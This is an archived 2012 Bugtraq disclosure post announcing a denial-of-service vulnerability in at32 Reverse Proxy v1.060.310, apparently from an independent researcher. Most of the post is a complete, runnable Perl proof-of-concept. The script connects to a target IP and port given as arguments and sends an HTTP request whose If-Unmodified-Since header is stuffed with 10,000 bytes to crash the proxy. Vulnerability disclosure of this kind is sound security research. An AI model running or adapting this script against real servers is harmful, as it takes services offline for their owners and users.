lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201203190304.q2J3453J002345@sf01web2.securityfocus.com>
Date: Mon, 19 Mar 2012 03:04:05 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: at32 ReverseProxy -  Multiple HTTP Header Field Denial Of Service
 Vulnerability

Title: at32 Reverse Proxy -  Multiple HTTP Header Field Denial Of Service Vulnerability

Product : at32 Reverse Proxy

Version : v1.060.310

Vendor: http://www.at32.com/doc/rproxy.htm

Class:  Boundary Condition Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-03-14

Updated:  

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
At32 Reverse Proxy allows you to host several websites on a single IP or port.
At32 Reverse Proxy contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, Server, etc...) in its HTTP Proxy service.

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*****************************************'."\n";
print '* At32 Reverse Proxy v1.060.310 DoS PoC *'."\n";
print '*      writed by demonalex@....com      *'."\n";
print '*****************************************'."\n";
$evil='A'x10000;
$test_ip=shift;                           #target ip
$test_port=shift;                         #target port
if(!defined($test_ip) || !defined($test_port)){
	die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@....com
mail: demonalex@....com / ChaoYi.Huang@...nect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ